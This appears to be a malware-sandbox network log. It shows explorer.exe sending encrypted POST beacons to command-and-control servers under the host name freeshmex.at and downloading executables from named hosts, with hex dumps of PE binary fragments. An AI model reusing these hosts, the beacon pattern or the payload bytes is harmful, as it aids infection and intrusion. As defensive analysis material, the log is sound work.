                                                        Nov 20, 2022 23:29:02.219815969 CET154OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5d 34 eb a8
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu]4bftlm&KETM0u=61`2.E:NHPjNWxONJ=>aS_-<$hzkW_FbpCLQ
                                                        Nov 20, 2022 23:29:03.169171095 CET155INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:02 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.44970241.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:03.278062105 CET156OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://pewoqsllm.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 216
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:03.278083086 CET156OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7d 45 d4 e6
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu}E|$BZoomjc)SZ*sVwd\GOWf :TKS;}6a'h>zz;=]!%@
                                                        Nov 20, 2022 23:29:03.689342022 CET156INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:03 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 43
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 59 39 08 a6 6d 59 b5 ab 15 bd cf b5 fa 6d 86 21 da ec 71 14 10 94 8f
                                                        Data Ascii: #\(Y9mYm!q


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.449703123.253.32.17080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:03.985562086 CET157OUTGET /root2.exe HTTP/1.1
                                                        Connection: Keep-Alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Host: 123.253.32.170
                                                        Nov 20, 2022 23:29:04.258891106 CET158INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Sun, 20 Nov 2022 22:29:04 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1134592
                                                        Last-Modified: Sun, 20 Nov 2022 22:20:03 GMT
                                                        Connection: keep-alive
                                                        ETag: "637aa813-115000"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 47 1a 01 67 26 74 52 67 26 74 52 67 26 74 52 79 74 e1 52 73 26 74 52 79 74 f7 52 13 26 74 52 79 74 f0 52 4b 26 74 52 40 e0 0f 52 60 26 74 52 67 26 75 52 10 26 74 52 79 74 fe 52 66 26 74 52 79 74 e0 52 66 26 74 52 79 74 e5 52 66 26 74 52 52 69 63 68 67 26 74 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 59 cd 01 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 fc 00 00 00 86 10 00 00 00 00 00 d8 51 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 12 00 00 04 00 00 77 3c 12 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 02 01 00 50 00 00 00 00 70 0f 00 68 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 11 00 ac 0a 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 2f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 fb 00 00 00 10 00 00 00 fc 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 3c 51 0e 00 00 10 01 00 00 1c 0e 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 70 02 00 00 70 0f 00 00 12 02 00 00 1c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 21 00 00 00 f0 11 00 00 22 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ce 06
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#Gg&tRg&tRg&tRytRs&tRytR&tRytRK&tR@R`&tRg&uR&tRytRf&tRytRf&tRytRf&tRRichg&tRPELYaQ@ w<LPph/@.text2 `.data<Q@.rsrchpp@@.reloc!".@B
                                                        Nov 20, 2022 23:29:04.258917093 CET160INData Raw: 01 00 00 00 00 00 54 04 01 00 64 04 01 00 84 04 01 00 96 04 01 00 a6 04 01 00 ba 04 01 00 d2 04 01 00 ea 04 01 00 fe 04 01 00 10 05 01 00 20 05 01 00 2c 05 01 00 42 05 01 00 52 05 01 00 68 05 01 00 7e 05 01 00 40 04 01 00 ac 05 01 00 bc 05 01 00
                                                        Data Ascii: Td ,BRh~@*FTfz&8J^r,DPh
                                                        Nov 20, 2022 23:29:04.258939028 CET161INData Raw: 6f 73 74 20 6c 69 6b 65 6c 79 20 74 68 65 20 72 65 73 75 6c 74 20 6f 66 20 63 61 6c 6c 69 6e 67 20 61 6e 20 4d 53 49 4c 2d 63 6f 6d 70 69 6c 65 64 20 28 2f 63 6c 72 29 20 66 75 6e 63 74 69 6f 6e 20 66 72 6f 6d 20 61 20 6e 61 74 69 76 65 20 63 6f
                                                        Data Ascii: ost likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug
                                                        Nov 20, 2022 23:29:04.258964062 CET162INData Raw: 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: (`h`hhhxppwpp
                                                        Nov 20, 2022 23:29:04.258994102 CET164INData Raw: 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 01 01 00 00 00 00 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5
                                                        Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdef
                                                        Nov 20, 2022 23:29:04.259030104 CET165INData Raw: 2e 44 4c 4c 00 00 08 31 4f 00 60 31 4f 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f 76 44 65 63 00 00 00 00 20 43 6f 6d
                                                        Data Ascii: .DLL1O`1OSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDec Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed
                                                        Nov 20, 2022 23:29:04.259061098 CET166INData Raw: 2c 00 00 00 3e 3d 00 00 3e 00 00 00 3c 3d 00 00 3c 00 00 00 25 00 00 00 2f 00 00 00 2d 3e 2a 00 26 00 00 00 2b 00 00 00 2d 00 00 00 2d 2d 00 00 2b 2b 00 00 2a 00 00 00 2d 3e 00 00 6f 70 65 72 61 74 6f 72 00 00 00 00 5b 5d 00 00 21 3d 00 00 3d 3d
                                                        Data Ascii: ,>=><=<%/->*&+---++*->operator[]!===!<<>> delete new__unaligned__restrict__ptr64__clrcall__fastcall__thiscall__stdcall__pascal__cdecl__based()@)@)@)@)@
                                                        Nov 20, 2022 23:29:04.259099007 CET168INData Raw: 61 00 77 00 6f 00 68 00 61 00 6c 00 69 00 67 00 65 00 74 00 6f 00 68 00 75 00 74 00 69 00 74 00 20 00 6a 00 69 00 66 00 6f 00 63 00 61 00 78 00 69 00 77 00 75 00 73 00 61 00 6b 00 00 00 70 61 6d 75 6b 65 7a 75 67 69 66 69 67 69 70 61 6b 6f 6a 75
                                                        Data Ascii: awohaligetohutit jifocaxiwusakpamukezugifigipakojupeluhasafeg tecupawezegecayixojamifciwusokomokoyale xenahomucomebetiyupopeyarojudukernel32.dllH
                                                        Nov 20, 2022 23:29:04.259126902 CET169INData Raw: 4f 00 74 c6 05 2c 35 4f 00 75 c6 05 2d 35 4f 00 61 c6 05 2e 35 4f 00 6c c6 05 30 35 4f 00 72 c6 05 31 35 4f 00 6f c6 05 32 35 4f 00 74 c6 05 33 35 4f 00 65 c6 05 34 35 4f 00 63 ff 15 50 10 40 00 a3 b8 45 4f 00 c7 45 fc 20 00 00 00 83 45 fc 20 8d
                                                        Data Ascii: Ot,5Ou-5Oa.5Ol05Or15Oo25Ot35Oe45OcP@EOE E EPu5OO5EOEOU4=OOSVWu<x@3VVVVVV@VVVVVOO;-h.@t@5OO3VEOl@EO
                                                        Nov 20, 2022 23:29:04.259152889 CET170INData Raw: 44 24 70 94 5f 02 35 81 44 24 70 0b b3 30 6e 81 44 24 64 5e 74 dc 14 81 6c 24 2c ef 63 9f 16 81 44 24 70 99 df 02 7c 81 6c 24 0c 2f 66 59 2e 81 44 24 3c a4 59 5c 15 81 44 24 0c 04 a5 75 7b 81 44 24 50 f3 47 9f 21 81 6c 24 3c 2b 55 7a 06 81 44 24
                                                        Data Ascii: D$p_5D$p0nD$d^tl$,cD$p|l$/fY.D$<Y\D$u{D$PG!l$<+UzD$7!JD$,TXl$:D$XNKR[D$LT4l$<x4D$$D_jD$pl$ ,l$VED$PFl$Pd-D$,EuD$tD$Pw{D$kq[l$ 8MD$'D$LLDD$LD$`
                                                        Nov 20, 2022 23:29:04.532651901 CET172INData Raw: 84 24 40 01 00 00 18 59 13 69 c7 84 24 18 01 00 00 04 e6 51 72 c7 84 24 9c 00 00 00 7e 0f 84 6e c7 84 24 5c 01 00 00 15 31 ea 21 c7 84 24 8c 00 00 00 ce 55 b3 5c c7 84 24 3c 01 00 00 11 78 f7 29 c7 84 24 28 01 00 00 4f 2b d8 0f c7 84 24 38 01 00
                                                        Data Ascii: $@Yi$Qr$~n$\1!$U\$<x)$(O+$8eO$8$j^N$j<$`$LM$_$K,$|~d$8[$V^:$05$p/$4T$lav


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.449704138.36.3.13480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:08.366631985 CET1353OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://vhuqghmu.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 166
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:08.366631985 CET1354OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 09 6b 2c 90 f4 76 0b 75 73 5d c9 f5
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA ,[k,vus]5Tj'x3e}Qk\,xEA\^w/<Isiu5su
                                                        Nov 20, 2022 23:29:09.296233892 CET1354INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:08 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        8192.168.2.449705210.182.29.7080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:10.022917986 CET1355OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://xwljygwi.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 138
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:10.022954941 CET1356OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5f 1a c0 ac
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu_Lx~W(i~)J(uYxntTH#P
                                                        Nov 20, 2022 23:29:11.131357908 CET1356INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:10 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        9192.168.2.449706190.140.74.4380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:11.593775034 CET1357OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://mubvqnkrma.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 150
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:11.594141960 CET1357OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 67 14 c7 ff
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vug^_ykt^MP<c'cVpvPs33JT*K)R~>v
                                                        Nov 20, 2022 23:29:12.459825993 CET1358INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:11 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.4497165.135.247.111443C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2022-11-20 22:29:22 UTC0OUTGET /upload/index.php HTTP/1.1
                                                        Connection: Keep-Alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Host: thepokeway.nl
                                                        2022-11-20 22:29:22 UTC0INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:22 GMT
                                                        Server: Apache
                                                        Content-Description: File Transfer
                                                        Content-Disposition: attachment; filename=e83a3a62.exe
                                                        Content-Transfer-Encoding: binary
                                                        Expires: 0
                                                        Cache-Control: must-revalidate
                                                        Pragma: public
                                                        Vary: Accept-Encoding
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        Content-Type: application/octet-stream
                                                        2022-11-20 22:29:22 UTC0INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 47 1a 01 67 26 74 52 67 26 74 52 67 26 74 52 79 74 e1 52 73 26 74 52 79 74 f7 52 13 26 74 52 79 74 f0 52 4b 26 74 52 40 e0 0f 52 60 26 74 52 67 26 75 52 10 26 74 52 79 74 fe 52 66 26 74 52 79 74 e0 52 66 26 74 52 79 74 e5 52 66 26 74 52 52 69 63 68 67 26 74 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a0 e5 50 61 00 00 00 00 00
                                                        Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$#Gg&tRg&tRg&tRytRs&tRytR&tRytRK&tR@R`&tRg&uR&tRytRf&tRytRf&tRytRf&tRRichg&tRPELPa
